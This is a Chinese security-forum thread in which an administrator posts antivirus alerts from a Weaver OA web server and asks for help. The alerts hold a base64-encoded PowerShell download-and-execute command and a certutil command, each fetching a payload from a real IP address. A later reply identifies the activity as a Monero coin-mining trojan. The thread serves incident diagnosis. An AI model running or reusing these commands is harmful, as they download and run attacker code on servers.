javaw.exe触犯应用加固规则,已阻止（麻烦各位老师帮忙分析）

77985197 · 发表于 2021-7-14 08:56:57

防护项目：Web服务器
操作目标：【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数：powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgAOAAuADEANgA1AC4AMgAzADAALgA2ADEAOgA4ADEAOAAwAC8AZABvAGMAcwAvAGQAZAAxAC4AdAB4AHQAJwApAA==
操作结果：已阻止

保护进程路径：D:\WEAVER\JDK\bin\javaw.exe
保护进程命令行：d:\WEAVER\JDK\bin\javaw -Xmx16550m -Xms16550m -XX:ParallelGCThreads=16 -XX:+UseConcMarkSweepGC -XX:-OmitStackTraceInFastThrow -XX:+UseParNewGC -XX:+DisableExplicitGC -javaagent:wagent.jar -Djdk.tls.ephemeralDHKeySize=2048 -Dfile.encoding=GBK -Dresin.server=app-0 -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djava.system.class.loader=com.caucho.loader.SystemClassLoader -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl -Djava.awt.headless=true -Djava.awt.headlesslib=true -Dresin.home=/d:/WEAVER/Resin -Xrs com.caucho.server.resin.Resin --root-directory /d:/WEAVER/Resin -conf d:\WEAVER\Resin\conf\resin.xml -server app-0 -socketwait 64946 -resin-home /d:/WEAVER/Resin -root-directory /d:/WEAVER/Resin gui

还有类似这样的：
============================================================
防护项目：Web服务器
操作目标：【执行】 C:\Windows\system32\certutil.exe
操作目标参数：certutil.exe -urlcache -split -f http://34.201.142.33/docs/hI.bat
操作结果：已阻止

保护进程路径：D:\WEAVER\JDK\bin\javaw.exe
保护进程命令行：d:\WEAVER\JDK\bin\javaw -Xmx10550m -Xms8550m -XX:ParallelGCThreads=20 -XX:+UseConcMarkSweepGC -XX:-OmitStackTraceInFastThrow -XX:+UseParNewGC -XX:+DisableExplicitGC -javaagent:wagent.jar -Djdk.tls.ephemeralDHKeySize=2048 -Dfile.encoding=GBK -Dresin.server=app-0 -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djava.system.class.loader=com.caucho.loader.SystemClassLoader -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl -Djava.awt.headless=true -Djava.awt.headlesslib=true -Dresin.home=/d:/WEAVER/Resin -Xrs com.caucho.server.resin.Resin --root-directory /d:/WEAVER/Resin -conf d:\WEAVER\Resin\conf\resin.xml -server app-0 -socketwait 53435 -resin-home /d:/WEAVER/Resin -root-directory /d:/WEAVER/Resin gui

这是一台OA服务器，不知道是误报还是什么问题，经常出现，谢谢。

火绒运营专员 · 发表于 2021-7-14 09:03:57

您好，麻烦您留下您的qq联系方式，之后会有相关专员添加您的联系方式，请您注意查看，感谢您的反馈~

77985197 · 发表于 2021-7-14 09:18:18

火绒运营专员发表于 2021-7-14 09:03
您好，麻烦您留下您的qq联系方式，之后会有相关专员添加您的联系方式，请您注意查看，感谢您的反馈~
...

QQ77985197,谢谢！

火绒运营专员 · 发表于 2021-7-14 09:24:28

77985197 发表于 2021-7-14 09:18
QQ77985197,谢谢！

已发送好友申请，请您注意查看

火绒运营专员 · 发表于 2021-7-14 17:31:00

您好，您的问题已经通过QQ 沟通并提供解决方案，感谢您的反馈~

test686 · 发表于 2021-7-16 09:51:50

本帖最后由 test686 于 2021-7-16 10:02 编辑

经过我的一番分析，确定这是一个挖矿木马，挖的是门罗币（XMR），矿池是：pool.supportxmr.com(钱包地址不公开)
目前已知行为：
篡改注册表
结束进程
删除文件
给自己的木马加权限
具体还得由火绒工程师分析
以上分析仅供参考
exe火绒已经入库：Trojan/CoinMiner.cv